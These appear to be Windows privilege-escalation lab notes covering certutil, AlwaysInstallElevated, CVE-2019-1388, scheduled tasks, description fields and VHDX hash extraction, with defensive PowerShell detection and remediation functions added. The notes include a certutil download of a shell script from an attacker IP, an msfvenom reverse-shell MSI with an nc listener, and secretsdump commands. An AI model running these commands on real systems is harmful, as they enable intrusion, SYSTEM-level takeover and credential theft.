
Misc

Living off the Land Binaries and Scripts (LOLBAS)

  • https://lolbas-project.github.io/

Certutil

  • Transferring a File with Certutil
    • certutil.exe -urlcache -split -f http://10.10.14.6:8080/shell.bat shell.bat
  • Encoding a File with Certutil
    • certutil -encode file1 encodedfile
  • Decoding a File with Certutil
    • certutil -decode encodedfile file2
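The three switches above are the ones that matter on the detection side: certutil is a legitimate PKI tool, but -urlcache with -split/-f, -encode and -decode are what turn it into a download and staging utility. The following PowerShell function is an added example (not part of these notes) that scores a process command line for those indicators; the $SampleCommandLines array is constructed here and mirrors the commands in the notes plus one benign certutil call, so in practice you would feed it the CommandLine field from Sysmon Event ID 1 or Security Event ID 4688.

```powershell
# Added example: flag certutil command lines that use LOLBAS download/encode/decode switches.
function Test-SuspiciousCertutil {
    param([Parameter(Mandatory)][string]$CommandLine)

    # Only look at certutil invocations (bare name, certutil.exe, or a full path).
    if ($CommandLine -notmatch '(?i)(^|[\\\s"])certutil(\.exe)?(\s|"|$)') { return }

    $indicators = @()
    # -urlcache together with -split or -f writes a remote file to disk.
    if ($CommandLine -match '(?i)-urlcache' -and $CommandLine -match '(?i)-(split|f)\b') { $indicators += 'download' }
    # -encode / -decode are used to wrap and unwrap payloads in base64.
    if ($CommandLine -match '(?i)-encode\b')      { $indicators += 'encode' }
    if ($CommandLine -match '(?i)-decode(hex)?\b') { $indicators += 'decode' }
    # A URL on a certutil command line is unusual outside of PKI administration.
    if ($CommandLine -match '(?i)https?://')       { $indicators += 'url' }

    if ($indicators.Count -eq 0) { return }
    [pscustomobject]@{
        CommandLine = $CommandLine
        Indicators  = ($indicators -join ',')
    }
}

# Constructed sample command lines (three from the notes above, one benign certificate check).
$SampleCommandLines = @(
    'certutil.exe -urlcache -split -f http://10.10.14.6:8080/shell.bat shell.bat',
    'certutil -encode file1 encodedfile',
    'certutil -decode encodedfile file2',
    'certutil -verify -urlfetch cert.cer'
)

$SampleCommandLines | ForEach-Object { Test-SuspiciousCertutil -CommandLine $_ } | Format-Table -AutoSize
```

The first three samples are reported with the indicators download,url / encode / decode; the -verify call produces no output, which is the point of keying on the specific switches rather than on the certutil process name alone.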

RUNDLL32

  • A binary such as rundll32.exe can be used to execute a DLL file. We could use this to obtain a reverse shell by executing a .DLL file that we either download onto the remote host or host ourselves on an SMB share.

Always Install Elevated

  • Enumerating 'Always Install Elevated' Setting
    • reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    • reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
      • RESPONSE - AlwaysInstallElevated REG_DWORD 0x1
  • Generating MSI Package
    • msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.6 lport=9443 -f msi > aie.msi
  • Executing MSI Package
    • nc -nvlp 9443
    • msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart
  • Catching Shell
    • We should receive a shell running as NT AUTHORITY\SYSTEM
  • This issue can be mitigated by disabling the two Local Group Policy settings mentioned above.
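The two reg query commands above have to be checked together, because the Windows Installer honours the policy only when both the HKCU and HKLM values are set to 1. The function below is an added example (not from these notes) that performs that check from PowerShell and, with -Remediate from an elevated prompt, applies the mitigation described above by setting both values to 0.

```powershell
# Added example: audit (and optionally disable) the AlwaysInstallElevated policy values.
function Get-AlwaysInstallElevatedStatus {
    [CmdletBinding()]
    param(
        # Set any value found at 1 back to 0. Writing HKLM requires an elevated prompt.
        [switch]$Remediate
    )

    $keys = [ordered]@{
        HKCU = 'HKCU:\Software\Policies\Microsoft\Windows\Installer'
        HKLM = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    }

    $status = [ordered]@{}
    foreach ($hive in $keys.Keys) {
        $key   = $keys[$hive]
        $value = $null
        if (Test-Path -Path $key) {
            $value = (Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        if ($value -eq 1 -and $Remediate) {
            Set-ItemProperty -Path $key -Name AlwaysInstallElevated -Value 0 -Type DWord
            $value = 0
        }
        # A missing value behaves the same as 0 (disabled).
        $status[$hive] = if ($null -eq $value) { 'not set' } else { $value }
    }

    [pscustomobject]@{
        HKCU_AlwaysInstallElevated = $status.HKCU
        HKLM_AlwaysInstallElevated = $status.HKLM
        # The policy is effective, and an MSI will run as SYSTEM, only when BOTH values are 1.
        Exploitable = ($status.HKCU -eq 1 -and $status.HKLM -eq 1)
    }
}

Get-AlwaysInstallElevatedStatus
# Get-AlwaysInstallElevatedStatus -Remediate    # run from an elevated prompt to disable both values
```

Because the registry values are written by Group Policy, a local remediation is only durable if the corresponding "Always install with elevated privileges" settings under Computer Configuration and User Configuration are also set to Disabled in the applicable GPO; otherwise the next policy refresh reapplies them.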

CVE-2019-1388

  • CVE-2019-1388 was a privilege escalation vulnerability in the Windows Certificate Dialog, which did not properly enforce user privileges. The issue was in the UAC mechanism, which presented an option to show information about an executable's certificate, opening the Windows certificate dialog when a user clicks the link. The Issued By field in the General tab is rendered as a hyperlink if the binary is signed with a certificate that has Object Identifier (OID) 1.3.6.1.4.1.311.2.1.10. This OID value is identified in the wintrust.h header as SPC_SP_AGENCY_INFO_OBJID which is the SpcSpAgencyInfo field in the details tab of the certificate dialog. If it is present, a hyperlink included in the field will render in the General tab. This vulnerability can be exploited easily using an old Microsoft-signed executable (hhupd.exe) that contains a certificate with the SpcSpAgencyInfo field populated with a hyperlink.
  • When we click on the hyperlink, a browser window will launch running as NT AUTHORITY\SYSTEM. Once the browser is opened, it is possible to "break out" of it by leveraging the View page source menu option to launch a cmd.exe or PowerShell.exe console as SYSTEM.
  • Affected versions - https://web.archive.org/web/20210620053630/https://gist.github.com/gentilkiwi/802c221c0731c06c22bb75650e884e5a

Exploitation

  • Click on the hhupd.exe executable
  • Click on Show information about the publisher's certificate
  • In Details, confirm that the SpcSpAgencyInfo field is populated
  • Click the Issued by hyperlink and press OK
    • If we open Task Manager, we will see that the browser instance was launched as SYSTEM.
  • Next, we can right-click anywhere on the web page and choose View page source.
    • Once the page source opens in another tab, right-click again and select Save as, and a Save As dialog box will open.
  • At this point, we can launch any program we would like as SYSTEM.
    • Type c:\windows\system32\cmd.exe in the file path and hit enter. If all goes to plan, we will have a cmd.exe instance running as SYSTEM.
  • PATCH - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1388

Scheduled Tasks

  • Enumerating Scheduled Tasks
    • schtasks /query /fo LIST /v
  • Enumerating Scheduled Tasks with PowerShell
    • Get-ScheduledTask | select TaskName,State
  • Checking Permissions on C:\Scripts Directory
    • .\accesschk64.exe /accepteula -s -d C:\Scripts\
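The accesschk64.exe check above answers one question for one directory: can a low-privileged user modify what a scheduled task runs? The function below is an added example (not from these notes) that asks the same question for every task on the host using only built-in cmdlets: it takes each task's action, expands the program path and any script path found in its arguments, and reports ACEs that grant write-type rights to Everyone, Users, Authenticated Users or INTERACTIVE. The list of broad principals and the write-rights mask are assumptions chosen for this example.

```powershell
# Added example: find scheduled-task targets that low-privileged principals can modify.
function Find-WritableScheduledTaskTargets {
    [CmdletBinding()]
    param(
        # Principals that should never hold write rights on a task's executable or script.
        [string[]]$BroadPrincipals = @(
            'Everyone',
            'BUILTIN\Users',
            'NT AUTHORITY\Authenticated Users',
            'NT AUTHORITY\INTERACTIVE'
        )
    )

    # Any of these rights lets a user replace or alter what the task executes.
    $writeMask = [int]([System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, WriteData, AppendData, TakeOwnership, ChangePermissions')
    # Script or binary paths that may appear inside the action's arguments (e.g. powershell.exe -File C:\Scripts\x.ps1).
    $pathPattern = '[A-Za-z]:\\[^"\s]+\.(ps1|bat|cmd|vbs|js|exe|dll)'

    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            # Only exec actions carry Execute/Arguments; COM-handler actions do not.
            if (-not $action.Execute) { continue }

            $candidates = New-Object System.Collections.Generic.List[string]
            $candidates.Add($action.Execute)
            if ($action.Arguments) {
                foreach ($m in [regex]::Matches($action.Arguments, $pathPattern)) { $candidates.Add($m.Value) }
            }

            foreach ($candidate in $candidates) {
                $path = [Environment]::ExpandEnvironmentVariables($candidate.Trim('"'))
                if (-not (Test-Path -LiteralPath $path -PathType Leaf)) { continue }

                foreach ($ace in (Get-Acl -LiteralPath $path).Access) {
                    if ($ace.AccessControlType -ne 'Allow') { continue }
                    if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
                    if (([int]$ace.FileSystemRights -band $writeMask) -eq 0) { continue }

                    [pscustomobject]@{
                        TaskName  = $task.TaskName
                        TaskPath  = $task.TaskPath
                        RunAs     = $task.Principal.UserId
                        Target    = $path
                        Principal = $ace.IdentityReference.Value
                        Rights    = $ace.FileSystemRights
                    }
                }
            }
        }
    }
}

Find-WritableScheduledTaskTargets | Format-Table -AutoSize
```

Rows where RunAs is SYSTEM or a privileged account and Principal is one of the broad groups are the findings to fix: move the script into a directory that inherits the default Program Files or Windows ACLs, or strip the write ACE with icacls, then re-run the function to confirm the row disappears.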

User/Computer Description Field

  • A sysadmin may store account details in a computer's or user's description field.
  • Checking Local User Description Field
    • Get-LocalUser
    • Get-DomainUser * |select samaccountname,description | ?{$_.Description -ne $null}
  • Enumerating Computer Description Field with Get-WmiObject Cmdlet
    • Get-WmiObject -Class Win32_OperatingSystem | select Description
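The three commands above each read one description source. The function below is an added example (not from these notes) that collects all three (local users, the computer's own description, and domain users when the ActiveDirectory RSAT module is available; it uses Get-ADUser rather than the PowerView Get-DomainUser shown above) and flags entries that contain credential-like keywords, so an administrator can find and scrub them. The keyword list is an assumption for this example.

```powershell
# Added example: gather user/computer description fields and flag credential-like content.
function Find-DescriptionFieldSecrets {
    [CmdletBinding()]
    param(
        # Words that suggest credentials were left in a description field (assumed list).
        [string[]]$Keywords = @('pass', 'pwd', 'cred', 'secret', 'login')
    )
    $pattern = '(?i)(' + ($Keywords -join '|') + ')'
    $entries = New-Object System.Collections.Generic.List[object]

    # Local accounts (same data as Get-LocalUser above).
    foreach ($u in Get-LocalUser) {
        if ($u.Description) {
            $entries.Add([pscustomobject]@{ Source = 'LocalUser'; Name = $u.Name; Description = $u.Description })
        }
    }

    # The computer's own description (same data as the Win32_OperatingSystem query above).
    $os = Get-CimInstance -ClassName Win32_OperatingSystem
    if ($os.Description) {
        $entries.Add([pscustomobject]@{ Source = 'Computer'; Name = $env:COMPUTERNAME; Description = $os.Description })
    }

    # Domain accounts, only when the ActiveDirectory module is installed on this host.
    if (Get-Module -ListAvailable -Name ActiveDirectory) {
        Get-ADUser -Filter 'Description -like "*"' -Properties Description | ForEach-Object {
            $entries.Add([pscustomobject]@{ Source = 'DomainUser'; Name = $_.SamAccountName; Description = $_.Description })
        }
    }

    # Attach a Flagged column so the output can be sorted or filtered on it.
    foreach ($e in $entries) {
        $e | Add-Member -NotePropertyName Flagged -NotePropertyValue ($e.Description -match $pattern) -PassThru
    }
}

Find-DescriptionFieldSecrets | Sort-Object Flagged -Descending | Format-Table -AutoSize
```

Flagged entries should be cleared with Set-LocalUser -Description or Set-ADUser -Description and the credential rotated, since the description attribute is readable by every authenticated domain user by default.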

Mount VHDX/VMDK

  • Mount VMDK on Linux
    • guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk
  • Mount VHD/VHDX on Linux
    • guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1
  • Mounting on Windows
    • https://www.nakivo.com/blog/extract-content-vmdk-files-step-step-guide/
  • Retrieving Hashes using Secretsdump.py
    • If we manage the above, we can access the C:\Windows\System32\Config directory and pull down the SAM, SECURITY, and SYSTEM registry hives.
    • secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL